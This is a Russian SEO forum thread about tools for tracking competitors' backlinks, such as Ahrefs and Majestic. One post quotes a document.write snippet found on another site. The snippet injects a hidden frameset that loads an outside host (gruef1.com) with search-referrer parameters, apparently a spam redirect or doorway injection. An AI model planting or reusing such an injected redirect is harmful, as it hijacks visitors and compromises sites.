Мониторинг конкурентов (качественный)

12
C
На сайте с 17.08.2012
21
1057

Перелопатил весь форум на предмет наиболее качественного софта по мониторингу конкурентов.

У нас такая ситуация, что у некоторых проектов есть очень сильные конкуренты (не с точки зрения реализации, а именно SEO). Вот хочу научиться и разобраться.

Специфика проектов разная: продажа услуги, информационный портал.

Я так понимаю, что раньше это был ahrefs. Что сейчас его лучше всего заменяет? Такой вопрос, что за качество надо платить, не смущает.

Спасибо.

(если будут предложения о сотрудничестве, то тоже с радостью рассмотрю)

september
На сайте с 11.09.2009
591
Я так понимаю, что раньше это был ahrefs.

А почему был? Он и сейчас есть.

Не тратьте время на анализ конкурентов, лучше тратьте время на развитие своего сайта. Со всех сторон, не только оптимизации.

$ карта для вывода вебмани в любой точке мира (https://www.epayments.com/registration?p=dc2462e885)
C
На сайте с 17.08.2012
21
september:
А почему был? Он и сейчас есть.

Не тратьте время на анализ конкурентов, лучше тратьте время на развитие своего сайта. Со всех сторон, не только оптимизации.

Отличный совет. Мы этим и занимаемся все время (работают и разработчики, и контентщики).

Но конкуренты, с меньшим количеством ресурсов прекрасно растут в поисковиках. Я так понимаю, что они используют какие-то действенные методики. Хочется понять какие.

S6
На сайте с 06.12.2011
158
SEO

Ahrefs - это инструмент, причем анализа внешней ссылочной. Если у Вас анализ конкурентов начинается и заканчивается на этом, тогда можете и другие подобные сервисы рассмотреть.

Я же думаю, анализ конкурентов это методика со своими соответствующими инструментами анализа по каждому из пунктов (например, внутренняя оптимизация, внешняя оптимизация, анализ трафика и позиций в поиске). Вам для начала с методикой надо определиться, а не с инструментами. Соответственно и выбор софта - последняя задача, никак не первая.

Аудит сайта. Консультации.
C
На сайте с 17.08.2012
21

Внутреннюю оптимизацию изучил. Анализ траффика показал большую долю поискового, что сочетается и с позициями в яндексе (сайт находится среди качественных ресурсов, которым по содержанию уступает).

По трафику - очень грамотно продвигаются. Отдельные страницы под запросы (они правда ухудшают юзабельность сервиса, но все же). Двигают ВЧ статьями.

Но я хотел бы иметь инструмент, который бы позволял наблюдать за максимальным количеством действий конкурентов(и их изменениями).

Proofer
На сайте с 04.11.2011
291

clevhier, изменений в каком плане? внутренняя оптимизация или внешняя? А то у вас сейчас хочу того не знаю чего.

C
На сайте с 17.08.2012
21

Внешних. Меня только это интересует в данный момент. Я же даже указал ahrefs (жаль, что они уменьшили функционал)

Про внутренние написал в ответ на предыдущее предложение.

Proofer
На сайте с 04.11.2011
291

clevhier, они там особо ничего и не уменьшили. Заходи и парсь ссылки обратные.

C
На сайте с 17.08.2012
21

Я вот тут накопал такое среди действий конкурента. На сайте malakhovo стоит такая вот вставочка

document.write("<frameset><frame src='http://gruef1.com/in.cgi?5&group=2&seoref=http%3A%2F%2Fyandex.ru%2Fyandsearch%3Fhow%3Dtm%26text%3D[***САЙТ_КОНКУРЕНТА***]%26lr%3D213&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwww.malakhovo.ru%2Fmyrmex_catalog%2Fuploaded%2Fi.php%3Fp%3D6c2rp4ehp0vdr&default_keyword=default'/></frameset>");

Поясните, что это за хрень такая?

При этом у конкурентов повылазило сразу несколько таких ссылок сейчас с одинаковых сайтов абсолютно (клоны или хз как называть).

Можно ли что-то предпринять против таких "непорядочных" конкурентов. Не хотелось бы скатываться до таких вот методов...

---------- Добавлено 22.04.2013 в 09:22 ----------

Proofer, Если на сайт приходит более 1000 НЧ запросов ежедневно, то хватит ли для парсинга минимального аккаунта? Или какой лучше подобрать?

B
На сайте с 08.02.2012
217
Такой вопрос, что за качество надо платить, не смущает.

ну и чем вам плох ашрефс? маджестик сео попробуйте, там подешевле

W0
На сайте с 02.04.2007
189

А что там смотреть то, все занимаются одним и тем же, улучшают внутреннее, прокачивают внешнее.

Так как дьявол кроется в деталях и при выстреливании какого-то конкурента, анализируйте просто этого конкурента более подробно, ахреф,соломоно, проход по страничкам для классификации доноров, ищем закономерности и т д

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий